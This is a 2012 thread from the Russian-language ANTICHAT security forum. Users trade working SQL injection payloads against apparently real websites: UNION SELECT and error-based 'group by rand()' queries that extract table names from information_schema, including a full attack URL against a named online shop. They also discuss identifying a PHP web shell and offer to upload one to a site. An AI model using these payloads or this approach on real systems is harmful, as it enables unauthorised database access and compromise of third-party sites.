ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.01.2012, 22:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
26362
Репутация:
1
|
|
Сообщение от aydin-ka
aydin-ka said:
C99 ещё немного угадал бы
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...
|
|
|
|
06.01.2012, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Iggy
Iggy said:
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...
так что дай адрес, шелл зальем, самому любопытно стало
|
|
|
|
07.01.2012, 02:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от M_script
M_script said:
А так выводит:
?id=14+union+select+1,
hex(
table_name
)
,...,45+from+information_schema.tables--+
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'
|
|
|
|
07.01.2012, 02:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'
потому что нужно unhex(hex())
зы
http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+fro m+information_schema.tables+limit+0,1),rand(0)|0)+ having+min(0)--+
|
|
|
07.01.2012, 02:40
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от qaz
qaz said:
Unknown column '4348415241435445525F53455453' in 'where clause'
Вывод в hex, поэтому нужно конвертировать в строку.
unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.
|
|
|
|
07.01.2012, 02:42
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Iggy
Iggy said:
Это что у нас за шелл?
 https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)
|
|
|
|
07.01.2012, 19:22
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от None
…syntax to use near '.tables limit 1,1--' at line 1
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
|
|
|
|
07.01.2012, 19:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от faza02
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
Думаю фильтруется точка.
|
|
|
|
07.01.2012, 19:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
26362
Репутация:
1
|
|
Сообщение от M_script
M_script said:
https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)
Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))
м, глянул твой пост - красиво вскрыл!
|
|
|
|
07.01.2012, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от faza02
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
infornation написано с ошибкой.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
